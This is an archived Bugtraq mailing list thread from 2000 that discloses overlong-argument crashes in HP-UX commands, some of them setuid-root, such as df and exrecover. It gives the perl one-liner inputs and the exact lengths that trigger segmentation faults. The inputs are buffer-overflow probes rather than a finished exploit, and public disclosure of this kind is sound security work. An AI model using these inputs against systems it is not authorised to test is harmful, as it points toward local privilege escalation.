Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: Possible vulnerability in HPUX ( Add vulnerability List )
From: ??? <loveyou () hackerslab org>
Date: Thu, 10 Aug 2000 13:36:50 +0900
Hi..

SYSTEM : HP-UX neptune B.11.00 A 9000/785

Memory fault  vaulnerability   list
---------------------------------

/usr/bin/cancel `perl -e 'print "x" x 6080'` -ua 
Memory fault

/bin/lpstat `perl -e 'print "x" x 185'` 
Memory fault

$ kermit -y `perl -e 'print "x" x 5085'` 
[/home/loveyou] C-Kermit>q
Memory fault(coredump)   

$ kermit -x `perl -e 'print "x" x 222'`
Executing /usr/share/lib/kermit/ckermit.ini for UNIX...
Good Evening.
Memory fault(coredump)    

/usr/sbin/swinstall -s `perl -e 'print "x" x 5085'`

/usr/sbin/swpackage -x `perl -e 'print "x" x 5085'`
Memory fault

/usr/sbin/swcopy -s `perl -e 'print "x" x 5085'` 

/usr/sbin/swask -s `perl -e 'print "x" x 5000'`

/usr/dt/bin/dtterm -tn `perl -e 'print "x" x 1019'`

/bin/rlogin `perl -e 'print "x" x 17080'` -l loveyou


:-)

by loveyou ( loveyou () hackerslab org )



----- Original Message ----- 
From: "Quentin GIORGI" <qgiorgi () SANCERRE GRENOBLE HP COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Wednesday, August 09, 2000 4:31 PM
Subject: Possible vulnerability in HPUX



Hello,

Few days ago i read the mail [ Hackerslab bug_paper ] HP-UX bdf -t
option buffer overflow vul. And decided to see any other possible
vulnerability(ies) on my ststem. (HP-UX 10.20).
After a *few* minutes ( maybe a little more :) ),trying each setuid exe
with different options, i finally got results as for bdf:
My basic knowledge tells me that it could be exploitable, but as i am
not a PA RISC assembly expert, i let anyone decide.

I have a quick query on the database vulnerability and can't see
anything about this on HPUX, but...

df:
---
sancerre: /home/qgiorgi>ll `which df`
-r-sr-xr-x   1 root       bin          69632 Jun 10  1996 /usr/bin/df

sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3631"`
df: ttt <skip> ttt : No such file or directory
usage : df [-F FStype] [-V] [-egiklnvfb] [-t|-P] [-o specific_options]
           [special | directory ...]
sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3632"`
Segmentation fault

exrecover:
--------
sancerre: /home/qgiorgi>ll `which exrecover`
-r-sr-xr-x   1 root       bin          20480 May 30  1996
/usr/lbin/exrecover

sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print
't'x4703"`
 File not found
sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print
't'x4704"`
Segmentation fault


And eventually, but it is owned by uucp i think it's less interesting.
uusub:
-----
sancerre: /home/qgiorgi>ll `which uusub`
-r-sr-xr-x   1 uucp       bin          32768 May 30  1996
/usr/lib/uucp/uusub
sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x212"`
sancerre: /home/qgiorgi>
sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x213"`
Segmentation fault

I also try this onHPUX 11.00 (9911)
uusub works with length of  225
exrecover works with length > 2700


I hope this could help.


---------------------------------------------------------------------------

Quentin GIORGI
Network Engineer
E.I.C IDA
---------------------------------------------------------------------------

  By Date           By Thread  

Current thread:
  • Re: Possible vulnerability in HPUX ( Add vulnerability List ) ??? (Aug 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]